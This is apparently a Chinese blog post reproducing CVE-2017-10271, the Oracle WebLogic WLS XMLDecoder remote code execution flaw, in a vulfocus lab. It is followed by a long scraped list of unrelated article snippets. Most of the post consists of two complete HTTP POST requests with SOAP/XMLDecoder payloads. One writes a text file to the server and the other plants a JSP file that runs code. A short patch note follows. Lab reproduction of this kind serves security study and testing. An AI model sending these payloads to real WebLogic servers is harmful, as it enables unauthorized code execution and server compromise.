Bolgzhang
Bolgzhang

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271 已亲自复现

  • 漏洞名称
    • 漏洞描述
    • 影响版本
  • 漏洞复现
    • 环境搭建
    • 漏洞利用
  • 修复建议

漏洞名称

漏洞描述

在Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.3/2.2.1/1.10/12.2.1.1/22.0(Application Server Soft ware)中发现了一个被归类为非常严重的漏洞。这会影响组件WLS Security的未知代码。

影响版本

Oracle Weblogic_Server 12.2.1.1.0
Oracle Weblogic_Server 10.3.6.0.0
Oracle Weblogic_Server 12.1.3.0.0
Oracle Weblogic_Server 12.2.1.2.0

漏洞复现

环境搭建

受害者IP:192.168.63.129:53342
攻击者IP:192.168.63.1

vulfocus下载链接

https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git

启动vulfocus

docker-compose up -d

环境启动后,访问http://192.168.63.129:53342即可看到一个404页面,说明已成功启动。
Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第1张图片漏洞的URL

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType1

访问路径/wls-wsat/CoordinatorPortType,出现下图所示页面说明可能存在漏洞。
Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第2张图片

漏洞利用

上传test.txt文件尝试一下

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.6.0" class="java.beans.XMLDecoder">
                <object class="java.io.PrintWriter">
                    <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                    <string>xmldecoder_vul_test</string></void><void method="close"/>
                </object>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第3张图片

访问URL:http://192.168.63.129:57677/wls-wsat/test.txtOracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第4张图片
上传test.jsp尝试一下

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.6.0" class="java.beans.XMLDecoder">
                <object class="java.io.PrintWriter">
                 <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println">
                    <string><![CDATA[ <% out.print("test"); %> ]]></string></void><void method="close"/>
                </object>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第5张图片

访问路径:http://192.168.63.129:57677/bea_wls_internal/test.jsp

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第6张图片

修复建议

目前官方已有可更新版本,建议受影响用户升级至最新版本。
补丁链接:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

你可能感兴趣的:(weblogic漏洞合集已复现,网络安全)

  • 【全网超详细】常用的 Windows CMD(命令提示符)指令合集 Wit's blog c++pythonpyqtscrapyscikit-learndashscipy
    以下整理了一份【全网超详细】常用的WindowsCMD(命令提示符)指令合集,并对其功能、常见用法及示例进行了分类与说明。希望能帮助你在日常或专业环境下快速定位和使用所需命令,提高工作与学习效率。为方便查阅,本篇会按照文件管理类、系统信息与网络类、进程与服务类、磁盘与系统维护类等主题进行梳理,每条命令配有简单示例及常见参数介绍。一、文件管理类指令1.dir功能:列出指定目录下的文件与子目录信息。常
  • Lab17_ Blind SQL injection with out-of-band data exfiltration 远川_Horizon web安全sql
    文章目录前言:进入实验室构造payload前言:实验室标题为:带外数据泄露的SQL盲注简介:本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。该数据库包含一个名为users的表,其中的列名为username和password。您需要利用SQL盲目注
  • 《“漏洞克星”集结令:Java实战派+安全极客,为Z世代打造技术诺亚方舟!》 ELIHU_han 安全开发java网络安全安全web安全计算机网络安全威胁分析系统安全
    【急聘!】Java全栈&安全开发勇士集结!和大学生/IT人一起搞事情,不卷只燃!#Java开发#安全工程师#初创团队招聘#大学生创业我们是谁?我们是一支“小而悍”的极客小队,正在打造一款面向在校大学生和IT新人的技术实战平台!(偷偷剧透:用Java写核心,用安全护数据,用开源搞事情!)拒绝大厂式内卷,专注用代码解决真实痛点。如果你也想“从0到1”参与产品诞生,这里就是你的战场!我们需要这样的你!1
  • 2025最新 DeepSeek学习资料汇总 啾啾859 pdf
    「DeepSeek资料合集」链接:https://pan.quark.cn/s/ad280bf95fb7「清华北大-Deepseek使用手册」链接:https://pan.quark.cn/s/98782f7d61dc「清华大学Deepseek整理)1-6版本链接:https://pan.quark.cn/s/72194e32428a资源链接:https://pan.quark.cn/s/3d40
  • 17 HarmonyOS NEXT UVList组件开发指南(四) harmonyos-next
    温馨提示:本篇博客的详细代码已发布到git:https://gitcode.com/nutpi/HarmonyosNext可以下载运行哦!HarmonyOSNEXTUVList组件开发指南(四)第四篇:UVList组件高级特性与性能优化1.高级特性1.1自定义渲染除了使用默认的渲染方式外,UVList组件还支持自定义渲染,以满足更复杂的UI需求:@Entry@ComponentstructCust
  • 16 HarmonyOS NEXT UVList组件开发指南(三) harmonyos-next
    温馨提示:本篇博客的详细代码已发布到git:https://gitcode.com/nutpi/HarmonyosNext可以下载运行哦!HarmonyOSNEXTUVList组件开发指南(三)第三篇:UVList组件使用方法与实际应用1.基础使用方法1.1引入组件使用UVList组件前,需要先引入组件和相关接口://引入接口定义import{ListItemProps,ListProps}fro
  • [网络安全提高篇] 一二八.恶意软件分析之利用MS Defender实现恶意样本家族批量标注(含学术探讨) Eastmount 网络安全自学篇web安全恶意软件分析恶意样本家族标注MSDefender
    2024新的战场,继续奋斗。“网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。换专业确实挺难的,Web渗透也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向虎山行。享受过程,一起加油~前文介绍了IDAPython配置过程和基础用法,然后尝试提取恶意软件
  • 网络安全工具汇总 Hacker_Fuchen web安全安全
    网络安全工具汇总漏洞及渗透练习平台WebGoat漏洞练习环境https://github.com/WebGoat/WebGoathttps://github.com/WebGoat/WebGoat-LegacyDamnVulnerableWebApplication(漏洞练习平台)https://github.com/RandomStorm/DVWA数据库注入练习平台https://github.
  • 在已安装Python环境的基础上安装anaconda或者其他版本Python IOT.FIVE.NO.1 软件安装python开发语言
    很早以前的记录。记录时间:2022-09-20因为学习的需要,在大二粗略学习过Python之后需要安装anaconda,由于anaconda本身包含Python版本,可能与我电脑上的原有的两个Python版本冲突,所以需要一些特殊的安装注意事项。解决方案一卸载本地python版本再安装anaconda简单粗爆且直白。直接卸载原有版本,再直接安装anaconda即可,这里介绍怎么卸载本地Python
  • 网络安全 api 网络安全 ast技术 Hacker_LaoYi web安全githubgit
    随着应用或者API被攻击利用已经越来越多,虽然来自开源组件的漏洞加剧了这一现象的发生,但是,其实主要还是在于应用程序或者API本身没有做好防范,根源在于源代码本身的质量没有严格把控。AST是指ApplicationSecurityTesting,主要包括静态应用测试(SAST)、交互式应用测试(IAST)、动态应用测试(DAST)以及软件成分分析(SCA)等工具。应用测试工具AST是专门用于检测源
  • PTA团体程序设计天梯赛-练习集(合集) 指针原来是套娃的 PTA团体设计天梯赛数据结构c语言c++算法
    目录前言L1-001HelloWorld思路L1-002打印沙漏思路L1-003个位数统计思路L1-004计算摄氏温度思路L1-005考试座位号思路L1-006连续因子:思路L1-007念数字思路L1-008求整数段和思路L1-009N个数求和思路L1-010比较大小思路L1-011A-B思路L1-012计算指数思路L1-013计算阶乘和思路L1-014简单题思路L1-015跟奥巴马一起画方块思路
  • 科技早报 | B站崩了、小红书崩了上热搜;OpenSSH漏洞预警:无需用户交互,可提权至 root | 最新快讯 最新科技快讯 量子计算
    本源量子与中国联通签署战略合作协议7月2日,本源量子计算科技(合肥)股份有限公司与中国联合网络通信有限公司签署了战略合作协议。根据协议,双方将携手探索中国自主量子算力在通信领域的应用,致力于推动中国通信事业的创新发展。这一合作标志着双方将在量子技术与通信行业的深度融合上展开实质性合作,共同加速相关技术成果转化和市场拓展。消息称谷歌TensorG5芯片已流片,预计采用3nm制摘要:谷歌下一代Tens
  • 基于CNN-BIGRU-Attention模型的功率预测(模型详解及代码复现) 清风AI 深度学习算法详解及代码复现深度学习人工智能算法机器学习计算机视觉cnn神经网络
    整体架构基于CNN-BiGRU-Attention模型的功率预测模型是一种融合了卷积神经网络(CNN)、双向门控循环单元(BiGRU)和注意力机制(Attention)的深度学习架构。这种混合模型旨在充分利用CNN的局部特征提取能力、BiGRU的长序列处理能力以及Attention机制的关键特征突出能力,从而提高功率预测的准确性和可靠性。模型的整体架构主要包括以下几个关键组件:输入层:设计的输入特
  • 互联网晚报 | 10月6日 星期三 | 微软正式推送Windows 11;网易严选西南首店落地成都;2021年诺贝尔物理学奖揭晓... 「已注销」 区块链微软iot比特币物联网
    今日看点✦2021年诺贝尔物理学奖揭晓,授予3位“复杂物理系统”研究者✦淘宝直播发布“超级种草官计划”,千万奖金、亿级流量奖励招募短视频种草达人✦网易严选西南首店落地成都,为新中产打造高品质生活方式✦电影《长津湖》成影史国庆档票房冠军,超过《我和我的祖国》✦积极推行驾驶证电子化,全国已发放1300多万个电子驾驶证✦微软正式推送Windows11系统,符合条件的Win10用户可免费升级国内要闻1、微
  • 【Axure高保真原型】多选树筛选表格 梓贤Vigo Axure原型产品经理交互中继器
    今天和大家分享多选树筛选表格的原型模板,点击树的箭头可以展开或者收起子级内容,点击多选按钮,可以切换选中或未选中,同时自动根据反选父级(未选、半选、全选),会根据已选中选项筛选表格数据。左侧的树和右侧的表格都是用中继器制作的,所以使用也很方便,只需要在中继器表格里填写对应内容,即可自动生成交互效果,具体效果可以观看下方视频或者打开预览地址体验。【原型效果含使用教程】【Axure高保真原型】多选树筛
  • SecureCRT 文件上传下载操作指南 FHKHH 两天学会Linuxlinux
    SecureCRT文件上传下载操作指南一、开启SFTP会话连接SFTP右键点击SecureCRT会话窗口标题栏→选择“连接SFTP会话”,或使用快捷键Alt+P打开SFTP面板。确认连接成功:成功连接后,命令行提示符变为sftp>,输入help可查看支持的命令列表。前提条件:确保远程服务器已启用SSH服务并支持SFTP(默认端口22)。二、目录操作命令本地目录操作查看本地当前路径lpwd列出本地目
  • 设计模式之中介者模式 Forget the Dream 设计模式设计模式中介者模式javac++
    引言某个工作日的早晨,小A发现楼栋电梯停运了。他打开物业小程序提交报修单,短短10分钟后,楼栋公告屏就亮起了提示:“电梯故障已受理,预计2小时内修复”。这看似简单的流程背后,隐藏着一个精密的协作系统:物业中心在收到报修后同步触发:生成维修工单(自动派发给签约维保公司)启动临时安保预案(通知巡逻岗重点监控3栋)推送进度通知(居民小程序/短信/公告屏三端同步)维修完成时,系统继续联动:关闭电梯警示标识
  • 如何在移动端优化ALU,降低手机发热和功耗 高级TA必看指数★★★★☆ 熊猫悟道 unityshader材质着色器unity游戏引擎
    最近工作中,未了进一步提升美术渲染效果,不得已我们需要从数学的角度优化我们的图形渲染,减少不必要的ALU和MUL,从而提升运行效率。提供更多的渲染效果支持。当然,虽然我们游戏现在发热已经控制的比较完美了,但是我们还能从硬件级优化。接下来就是我这段时间用了半斤头发研究出来的方案。绝对干货,优化图形这块照搬即可。总结一下,可能的优化步骤包括:减少复杂数学运算,使用近似或预计算。优化向量化运算,利用SI
  • Java nmap 命令 网络安全(king) 网络安全黑客网络工程师网络web安全安全
    Java与Nmap的结合:网络安全监测利器在现代网络环境中,安全性是至关重要的。尤其在企业和组织中,维护网络的安全性将直接影响到其运营的正常进行。Nmap(NetworkMapper)是一个开源的网络扫描工具,广泛应用于网络安全评估。今天,我们结合Java语言,探讨如何利用Java调用Nmap命令以实现网络安全监测的目的。什么是Nmap?Nmap是一个强大的网络扫描工具,可以用于发现网络上的设备、
  • Hbase在hdfs上的archive目录占用空间过大 宝罗Paul 大数据hbase
    hbase版本:1.1.2hadoop版本:2.7.3Hbase在hdfs上的目录/apps/hbase/data/archive占用空间过大,导致不停地发出hdfs空间使用率告警。【问题】告警信息alert:datanode_storageistriggered告警信息表明某个或某些datanode的HDFS存储空间使用率已超过阈值(我们设置的是80%),需要清理。[hdfs@master-2r
  • 阿里淘天多模态大模型面经分享 大模型与自然语言处理 NLP与大模型面试人工智能算法深度学习大模型多模态大模型
    最近春招和实习已开启了。不同以往的是,当前职场环境已不再是那个双向奔赴时代了。求职者在变多,HC在变少,岗位要求还更高了。最近,我们又陆续整理了很多大厂的面试题,帮助一些球友解惑答疑,分享技术面试中的那些弯弯绕绕。《大模型面试宝典》(2025版)正式发布!喜欢本文记得收藏、关注、点赞。部门与岗位淘天-搜推智能产品事业部-多模态大模型总结整体来说面试体验比较好,问的问题都不难,面试官也都不错,遇到一
  • 4.2 Hugging Face狂揽40亿背后的开源变现密码:GitHub明星项目的黄金投资法则 少林码僧 开源github语言模型人工智能sentinel
    HuggingFace狂揽40亿背后的开源变现密码:GitHub明星项目的黄金投资法则关键词:开源项目商业化、GitHub生态分析、AIAgent投资策略、开发者工具市场、技术产品价值评估1.开源项目商业化的黄金时代根据GitHub2023年度报告数据,全球开源项目已突破3.5亿个,企业级开源贡献量年增长率达34%。明星开源项目的商业化路径呈现明显特征:
  • Manus:颠覆 AI 代理的新时代
    ReactHook深入浅出CSS技巧与案例详解vue2与vue3技巧合集VueUse源码解读Manus,这款突破性的AI代理,近期在科技界掀起了巨大波澜。它由中国AI初创公司Monica开发,并于2025年3月初正式亮相。在联合创始人兼首席科学家Yichao“Peak”Ji的演示视频中,Manus展现了其强大的自动化执行能力。这个AI代理的名字来源于拉丁语“Manus”,意为“手”,寓意它能充当用
  • 使用Python 打造专属自己的屏幕录制工具:使用NumPy、PIL和OpenCV的完整指南 LIY若依 opencv人工智能python应用开发录屏软件
    简介在这篇博客中,我们将介绍如何使用NumPy、PIL和OpenCV创建一个屏幕录制工具。通过逐步解析代码片段,解释每个部分的功能,最终展示完整代码。希望这篇博客能帮助你理解如何实现屏幕录制功能。依赖库在运行代码之前,请确保已安装以下依赖库:NumPyPIL(Pillow)OpenCV可以使用以下命令安装这些库:pipinstallnumpypillowopencv-python步骤1:导入必要的
  • 解锁数据之美:Python 创意可视化的 10 种高阶玩法与技术深度解析 tekin Python高阶工坊Python编程秘籍库信息可视化Python创意可视化
    在数据爆炸的时代,静态图表已难以满足信息传递的需求。本文深入剖析Python数据可视化的前沿技术与创意方向,结合Matplotlib、Plotly、Dash等主流库,通过交互式仪表盘、3D动态图形、地理信息融合等案例,展示如何将冰冷的数据转化为具有故事性的视觉叙事。文章不仅提供代码实现,还探讨技术原理与设计思维,帮助读者构建从数据到洞察的完整能力链。目录一、交互式仪表盘:动态数据的实时对话技术核心
  • 【C++设计模式】第十三篇:责任链模式(Chain of Responsibility) JuicyActiveGilbert C++设计模式c++设计模式责任链模式
    注意:复现代码时,确保VS2022使用C++17/20标准以支持现代特性。动态传递请求的处理流水线1.模式定义与用途核心思想责任链模式:将多个处理对象连成一条链,请求沿链传递直至被处理。每个处理者可选择处理请求或转发给下一处理者。关键用途:1.解耦请求与处理:发送者无需知道具体处理者。2.动态调整处理流程:运行时增删处理节点(如日志过滤链、审批流程)。经典场景中间件处理HTTP请求(认证、限流、日
  • Web网站漏洞扫描与渗透攻击 嗨起飞了 网络安全网络安全web安全
    Web网站漏洞扫描与渗透攻击工具全解析:从防御者到攻击者的双重视角网络安全是永无止境的攻防博弈前言:数字世界的攻守之道在数字化转型的浪潮中,Web应用已成为网络攻击的主要目标。根据CybersecurityVentures的统计,2023年全球因网络攻击导致的经济损失预计突破8万亿美元。作为开发者或安全工程师,了解常见漏洞扫描工具和渗透测试技术已成为必备技能。本文将从防御和攻击双重视角,深入剖析主
  • 黑客入门手册 嗨起飞了 网络安全网络攻击模型网络安全
    零基础入门网络安全:黑客技术学习路线与实战手册摘要:本文面向网络安全初学者,系统化拆解黑客技术学习路径,涵盖基础理论、实战工具和代码实例。内容遵循合法合规原则,仅用于技术研究。一、黑客技术学习的认知前提1.1什么是真正的"黑客"黑客精神的核心:探索系统原理与漏洞本质白帽/灰帽/黑帽的伦理边界(以《网络安全法》为准则)1.2学习前的法律警示渗透测试授权原则虚拟机实验环境搭建的重要性推荐工具:VMwa
  • 在协议中,语义感知能力 海青橘 论文阅读笔记论文术语
    在协议(如网络协议、数据格式协议等)的上下文中,语义感知能力指的是系统对协议数据(如报文、字段、交互流程等)实际含义和逻辑关联的理解能力,而不仅仅是语法层面的合规性检查。这种能力使系统能够根据协议设计的意图、业务逻辑或潜在漏洞模式,智能地生成、解析或测试协议数据。协议中语义感知能力的核心要素协议结构理解能力:解析协议的格式规范(如HTTP头、JSON键值对、TCP握手流程),识别字段的功能角色(如
  • 通领科技冲刺北交所 FIN6668 搜索引擎安全大数据科技
    高质量增长奔赴产业新征程日前,通领科技已正式启动在北交所的IPO进程,期望借助资本市场的力量,加速技术升级,推动全球化战略布局。这一举措不仅展现了中国汽车零部件企业的强大实力,也预示着行业转型升级的新突破。通领科技近年来业绩表现亮眼,呈现出强劲的增长势头。据公司财报,从2021年至2024年上半年,公司营业收入依次为8.46亿元、8.92亿元、10.13亿元和4.90亿元;同期扣除非经常性损益后的
  • 多线程编程之join()方法 周凡杨 javaJOIN多线程编程线程
    现实生活中,有些工作是需要团队中成员依次完成的,这就涉及到了一个顺序问题。现在有T1、T2、T3三个工人,如何保证T2在T1执行完后执行,T3在T2执行完后执行?问题分析:首先问题中有三个实体,T1、T2、T3, 因为是多线程编程,所以都要设计成线程类。关键是怎么保证线程能依次执行完呢?   Java实现过程如下: public class T1 implements Runnabl
  • java中switch的使用 bingyingao javaenumbreakcontinue
    java中的switch仅支持case条件仅支持int、enum两种类型。 用enum的时候,不能直接写下列形式。 switch (timeType) { case ProdtransTimeTypeEnum.DAILY: break; default: br
  • hive having count 不能去重 daizj hive去重having count计数
    hive在使用having count()是,不支持去重计数   hive (default)> select imei from t_test_phonenum where ds=20150701 group by imei having count(distinct phone_num)>1 limit 10;  FAILED: SemanticExcep
  • WebSphere对JSP的缓存 周凡杨 WAS JSP 缓存
          对于线网上的工程,更新JSP到WebSphere后,有时会出现修改的jsp没有起作用,特别是改变了某jsp的样式后,在页面中没看到效果,这主要就是由于websphere中缓存的缘故,这就要清除WebSphere中jsp缓存。要清除WebSphere中JSP的缓存,就要找到WAS安装后的根目录。        现服务
  • 设计模式总结 朱辉辉33 java设计模式
    1.工厂模式   1.1 工厂方法模式 (由一个工厂类管理构造方法)      1.1.1普通工厂模式(一个工厂类中只有一个方法)      1.1.2多工厂模式(一个工厂类中有多个方法)      1.1.3静态工厂模式(将工厂类中的方法变成静态方法) &n
  • 实例:供应商管理报表需求调研报告 老A不折腾 finereport报表系统报表软件信息化选型
    引言 随着企业集团的生产规模扩张,为支撑全球供应链管理,对于供应商的管理和采购过程的监控已经不局限于简单的交付以及价格的管理,目前采购及供应商管理各个环节的操作分别在不同的系统下进行,而各个数据源都独立存在,无法提供统一的数据支持;因此,为了实现对于数据分析以提供采购决策,建立报表体系成为必须。 业务目标 1、通过报表为采购决策提供数据分析与支撑 2、对供应商进行综合评估以及管理,合理管理和
  • mysql 林鹤霄
    转载源:http://blog.sina.com.cn/s/blog_4f925fc30100rx5l.html mysql -uroot -p ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)   [root@centos var]# service mysql
  • Linux下多线程堆栈查看工具(pstree、ps、pstack) aigo linux
    原文:http://blog.csdn.net/yfkiss/article/details/6729364   1. pstree pstree以树结构显示进程$ pstree -p work | grep adsshd(22669)---bash(22670)---ad_preprocess(4551)-+-{ad_preprocess}(4552)  &n
  • html input与textarea 值改变事件 alxw4616 JavaScript
    // 文本输入框(input) 文本域(textarea)值改变事件 // onpropertychange(IE) oninput(w3c) $('input,textarea').on('propertychange input', function(event) {      console.log($(this).val()) });  
  • String类的基本用法 百合不是茶 String
      字符串的用法;     // 根据字节数组创建字符串 byte[] by = { 'a', 'b', 'c', 'd' }; String newByteString = new String(by);         1,length()  获取字符串的长度     &nbs
  • JDK1.5 Semaphore实例 bijian1013 javathreadjava多线程Semaphore
    Semaphore类        一个计数信号量。从概念上讲,信号量维护了一个许可集合。如有必要,在许可可用前会阻塞每一个 acquire(),然后再获取该许可。每个 release() 添加一个许可,从而可能释放一个正在阻塞的获取者。但是,不使用实际的许可对象,Semaphore 只对可用许可的号码进行计数,并采取相应的行动。 S
  • 使用GZip来压缩传输量 bijian1013 javaGZip
            启动GZip压缩要用到一个开源的Filter:PJL Compressing Filter。这个Filter自1.5.0开始该工程开始构建于JDK5.0,因此在JDK1.4环境下只能使用1.4.6。         PJL Compressi
  • 【Java范型三】Java范型详解之范型类型通配符 bit1129 java
        定义如下一个简单的范型类,   package com.tom.lang.generics; public class Generics<T> { private T value; public Generics(T value) { this.value = value; } }
  • 【Hadoop十二】HDFS常用命令 bit1129 hadoop
    1. 修改日志文件查看器   hdfs oev -i edits_0000000000000000081-0000000000000000089 -o edits.xml cat edits.xml   修改日志文件转储为xml格式的edits.xml文件,其中每条RECORD就是一个操作事务日志   2. fsimage查看HDFS中的块信息等 &nb
  • 怎样区别nginx中rewrite时break和last ronin47
    在使用nginx配置rewrite中经常会遇到有的地方用last并不能工作,换成break就可以,其中的原理是对于根目录的理解有所区别,按我的测试结果大致是这样的。 location /    {         proxy_pass http://test; 
  • java-21.中兴面试题 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等于 m bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; public class CombinationToSum { /* 第21 题 2010 年中兴面试题 编程求解: 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等
  • eclipse svn 帐号密码修改问题 开窍的石头 eclipseSVNsvn帐号密码修改
    问题描述:      Eclipse的SVN插件Subclipse做得很好,在svn操作方面提供了很强大丰富的功能。但到目前为止,该插件对svn用户的概念极为淡薄,不但不能方便地切换用户,而且一旦用户的帐号、密码保存之后,就无法再变更了。 解决思路:      删除subclipse记录的帐号、密码信息,重新输入
  • [电子商务]传统商务活动与互联网的结合 comsci 电子商务
          某一个传统名牌产品,过去销售的地点就在某些特定的地区和阶层,现在进入互联网之后,用户的数量群突然扩大了无数倍,但是,这种产品潜在的劣势也被放大了无数倍,这种销售利润与经营风险同步放大的效应,在最近几年将会频繁出现。。。。        如何避免销售量和利润率增加的
  • java 解析 properties-使用 Properties-可以指定配置文件路径 cuityang javaproperties
    #mq xdr.mq.url=tcp://192.168.100.15:61618; import java.io.IOException; import java.util.Properties; public class Test { String conf = "log4j.properties"; private static final
  • Java核心问题集锦 darrenzhu java基础核心难点
    注意,这里的参考文章基本来自Effective Java和jdk源码 1)ConcurrentModificationException 当你用for each遍历一个list时,如果你在循环主体代码中修改list中的元素,将会得到这个Exception,解决的办法是: 1)用listIterator, 它支持在遍历的过程中修改元素, 2)不用listIterator, new一个
  • 1分钟学会Markdown语法 dcj3sjt126com markdown
    markdown 简明语法 基本符号 *,-,+ 3个符号效果都一样,这3个符号被称为 Markdown符号 空白行表示另起一个段落 `是表示inline代码,tab是用来标记 代码段,分别对应html的code,pre标签 换行 单一段落( <p>) 用一个空白行 连续两个空格 会变成一个 <br> 连续3个符号,然后是空行
  • Gson使用二(GsonBuilder) eksliang jsongsonGsonBuilder
    转载请出自出处:http://eksliang.iteye.com/blog/2175473 一.概述     GsonBuilder用来定制java跟json之间的转换格式   二.基本使用 实体测试类: 温馨提示:默认情况下@Expose注解是不起作用的,除非你用GsonBuilder创建Gson的时候调用了GsonBuilder.excludeField
  • 报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList gundumw100 android
    有一个工程,本来运行是正常的,我想把它移植到另一台PC上,结果报: java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.mobovip.bgr/com.mobovip.bgr.MainActivity}: java.lang.ClassNotFoundException: Didn't f
  • JavaWeb之JSP指令 ihuning javaweb
      要点   JSP指令简介  page指令  include指令    JSP指令简介    JSP指令(directive)是为JSP引擎而设计的,它们并不直接产生任何可见输出,而只是告诉引擎如何处理JSP页面中的其余部分。 JSP指令的基本语法格式: <%@ 指令 属性名="
  • mac上编译FFmpeg跑ios 啸笑天 ffmpeg
    1、下载文件:https://github.com/libav/gas-preprocessor, 复制gas-preprocessor.pl到/usr/local/bin/下, 修改文件权限:chmod 777 /usr/local/bin/gas-preprocessor.pl 2、安装yasm-1.2.0 curl http://www.tortall.net/projects/yasm
  • sql mysql oracle中字符串连接 macroli oraclesqlmysqlSQL Server
    有的时候,我们有需要将由不同栏位获得的资料串连在一起。每一种资料库都有提供方法来达到这个目的: MySQL: CONCAT() Oracle: CONCAT(), || SQL Server: + CONCAT() 的语法如下: Mysql 中 CONCAT(字串1, 字串2, 字串3, ...): 将字串1、字串2、字串3,等字串连在一起。 请注意,Oracle的CON
  • Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate qiaolevip 学习永无止境每天进步一点点git纵观千象
    // 报错如下: $ git pull origin master fatal: unable to access 'https://git.xxx.com/': SSL certificate problem: unable to get local issuer ce rtificate   // 原因: 由于git最新版默认使用ssl安全验证,但是我们是使用的git未设
  • windows命令行设置wifi surfingll windowswifi笔记本wifi
    还没有讨厌无线wifi的无尽广告么,还在耐心等待它慢慢启动么 教你命令行设置 笔记本电脑wifi: 1、开启wifi命令 netsh wlan set hostednetwork mode=allow ssid=surf8 key=bb123456 netsh wlan start hostednetwork pause 其中pause是等待输入,可以去掉 2、
  • Linux(Ubuntu)下安装sysv-rc-conf wmlJava linuxubuntusysv-rc-conf
    安装:sudo apt-get install sysv-rc-conf 使用:sudo sysv-rc-conf 操作界面十分简洁,你可以用鼠标点击,也可以用键盘方向键定位,用空格键选择,用Ctrl+N翻下一页,用Ctrl+P翻上一页,用Q退出。     背景知识 sysv-rc-conf是一个强大的服务管理程序,群众的意见是sysv-rc-conf比chkconf
  • svn切换环境,重发布应用多了javaee标签前缀 zengshaotao javaee
    更换了开发环境,从杭州,改变到了上海。svn的地址肯定要切换的,切换之前需要将原svn自带的.svn文件信息删除,可手动删除,也可通过废弃原来的svn位置提示删除.svn时删除。   然后就是按照最新的svn地址和规范建立相关的目录信息,再将原来的纯代码信息上传到新的环境。然后再重新检出,这样每次修改后就可以看到哪些文件被修改过,这对于增量发布的规范特别有用。   检出
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他